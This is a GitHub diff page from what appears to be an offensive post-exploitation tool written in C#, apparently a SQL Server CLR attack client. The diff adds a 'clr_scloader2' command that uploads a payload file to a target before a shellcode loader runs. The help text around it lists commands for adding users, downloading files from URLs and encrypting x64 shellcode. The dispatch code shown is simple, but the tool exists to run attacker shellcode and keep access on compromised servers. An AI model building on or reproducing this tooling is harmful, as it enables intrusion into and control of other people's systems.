File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree Original file line number Diff line number Diff line change @@ -36,6 +36,7 @@ private static void Help()
3636clr_adduser {user} {pass} - add user by clr
3737clr_download {url} {path} - download file from url by clr
3838clr_scloader {code} {key} - Encrypt Shellcode by Encrypt.py (only supports x64 shellcode.bin)
39+ clr_scloader2 {remotefile} - Upload Payload.bin to target before Shellcode Loader
3940exit - terminates the server process (and this session)"
4041) ;
4142 }
@@ -354,6 +355,13 @@ static void interactive(string[] args)
354355 clr_exec ( s ) ;
355356 break ;
356357 }
358+ case "clr_scloader2" :
359+ {
360+ String s = String . Empty ;
361+ for ( int i = 0 ; i < cmdline . Length ; i ++ ) { s += cmdline [ i ] + " " ; }
362+ clr_exec ( s ) ;
363+ break ;
364+ }
357365 case "clr_download" :
358366 {
359367 String s = String . Empty ;
@@ -502,6 +510,13 @@ static void Noninteractive(string[] args)
502510 clr_exec ( s ) ;
503511 break ;
504512 }
513+ case "clr_scloader2" :
514+ {
515+ String s = String . Empty ;
516+ for ( int i = 3 ; i < args . Length ; i ++ ) { s += args [ i ] + " " ; }
517+ clr_exec ( s ) ;
518+ break ;
519+ }
505520 case "clr_download" :
506521 {
507522 String s = String . Empty ;
Load diff Large diffs are not rendered by default.
You can’t perform that action at this time.
0 commit comments